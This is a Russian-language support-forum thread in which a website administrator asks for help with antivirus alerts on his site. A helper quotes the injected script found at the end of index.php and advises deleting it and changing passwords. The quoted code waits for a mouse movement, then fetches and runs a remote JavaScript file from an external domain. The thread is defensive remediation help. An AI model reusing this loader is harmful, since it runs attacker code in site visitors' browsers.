Перейти к содержанию
Правила раздела

Вирус на сайте

Mr.kvn

От Mr.kvn
в Помощь в удалении вирусов

 Share

Рекомендуемые сообщения

Mr.kvn Постоялец

Mr.kvn

Опубликовано
Опубликовано

Доброго времени суток!

У меня следующая проблема: я помогаю в администрировании сайта mtt.com.ua. Все было хорошо и вот месяц назад начались проблемы - на многих страницах сайта разные антивирусные системы (в т.ч. и касперский) начали ругаться. Сам сайт я не создавал (там самописная админка и изобретателя найти не представляется возможным). До поры, до времени я не особо нервничал т.к. все вирусы были в java-скриптах, которые я аккуратненько удалял (сделав бэкап) и при этом функционал не менялся (по крайней мере я не видел и жалоб до сих пор не поступало). Но сейчас беда оказалась в index-ном файле категории... Тут уже мириться не представляется возможным.

 

Ссылка проверки на вирусы: virustotal

 

Заранее благодарю за помощь в решении проблеммы.

Сообщение от модератора Mark D. Pearlstone
Файл и потенциально вредоносная ссылка удалены. Если потребуется, хелперы запросят у вас ссылку, которую вы можете им передать через личные сообщения.
Ссылка на комментарий
Поделиться на другие сайты
SLASH_id Гигант мысли

SLASH_id

Опубликовано
Опубликовано

Отредактируйте index.php

Удалите оттуда скрипт в самом конце:

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></script><script type="text/javascript">var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1; x.getScript('http://firefoxstabs.com/' + Math.random().toString().substring(3) + '.js', function() {flag = 2;});}});});</script>document.write('<scr'+'ipt src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></scr'+'ipt>');var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1;x.getScript('http://firefoxstabs.com/' + Math.random().toString().substring(3) + '.js', function() {flag = 2;});}});});

 

Смените пароли на админку, хостинг и прочие.

Ссылка на комментарий
Поделиться на другие сайты
Mr.kvn Постоялец

Mr.kvn

Опубликовано
  • Автор
Опубликовано

Адрес https://ajax.googleapis.com/ajax/libs/jquer...1/jquery.min.js вроде как безобидный...

 

Дело в том, что этот скрипт предназначается для вставки Google Analytics из админки. Другой вопрос, что на других старницах все норм, а тут... Я абсолютный дуб в java, поэтому не знаю какой фрагмент отсюда вырезать, чтобы функционал остался на месте, а вируса не было...

 

P.s. собственно, где тут вирус? Поясните пожалуйста... просто чтобы на будущее знать.

Ссылка на комментарий
Поделиться на другие сайты
SLASH_id Гигант мысли

SLASH_id

Опубликовано
Опубликовано (изменено)

Отрежьте все после 

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></script>

А лучше вырежьте все. А после - вставьте код от Google Analytics

Изменено пользователем SLASH_id
Ссылка на комментарий
Поделиться на другие сайты
Mark D. Pearlstone Мудрец

Mark D. Pearlstone

Опубликовано
Опубликовано
У меня в данный момент не ругается на http://mtt.com.ua/
Аналогично.. все нормально.

На данную ссылку и утром антивирус не ругался, поэтому она была не удалена. Ссылка же с детектом была убрана из первого сообщения.

Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
 Share
Перейти к списку тем

  • Похожий контент

    • qwester
      Сайт блокируется ФинСерт
      От qwester
      Прошу прощения если не туда.
      У меня есть интеренет-магазин, который принимает оплату по банковским картам, но клиенты не могут оплатить, в службе поддержки эквайринга из банка написали следущее:
      IP-адрес XXX был заблокирован по рекомендации от ФинЦерт.
      Для исключения ip-адреса из списка ФинЦерт коллеги порекомендовали обратиться в Лабораторию Касперского, так как информация в ФинЦерт поступила от них.
       
      Что с этим делать? Сайт находится на общем хостинге, не VDS
    • красноджан
      что это за сайт?
      От красноджан
      выкинуло с рекламы на сайт [удалено] на вашем компьютере обнаружены вирусы для лечения отправте смс
       

      Сообщение от модератора thyrex Удалена ссылка
    • Хасан Абдурахман
      Касперский тормозит открытие сайтов.
      От Хасан Абдурахман
      Открываеш гугл. Кликаеш по ссылке на какой нибудь сайт . И ждешь, пока касперский решит его открыть. Иногда 3-5 минут ждешь. Аж вся душа выматывается.  
    • San4s2034
      Вирус-майнер
      От San4s2034
      Недавно скачал Game of Thrones Genesis с torrent-game.net. Касперски указал, что сайту можно доверять и он проверен. По итогу через время заметил, что в valorant фпс стал заблоченным на 75 и поднимается вверх только если я двигаю мышкой или нажимаю что-то на клавиатуре. Очевидно, что словил майнер. Запустил быструю и полную проверку, результата не дало. Попробовал через защитник windows 11. Заметил, что прогресс доходит до ~70% и потом просто зависает. Запустился через безопасный режим, зашёл в защитник и вылезла ошибка(скриншот). Проверил реестр и групповые политики, ничего нет, все чисто. 

    • initial77
      Остановлен переход на недоверенный сайт - отключить
      От initial77
      Добрый день,
       
      Как это отключить раз и навсегда?
      Я не могу даже попасть на собственный роутер, меня это выбешивает уже.
      Если это нельзя отключить я просто удалю ваш продукт.
      Я не хочу ковыряться с исключениями - как просто взять и отключить этот кусок функционала??
×
×
  • Создать...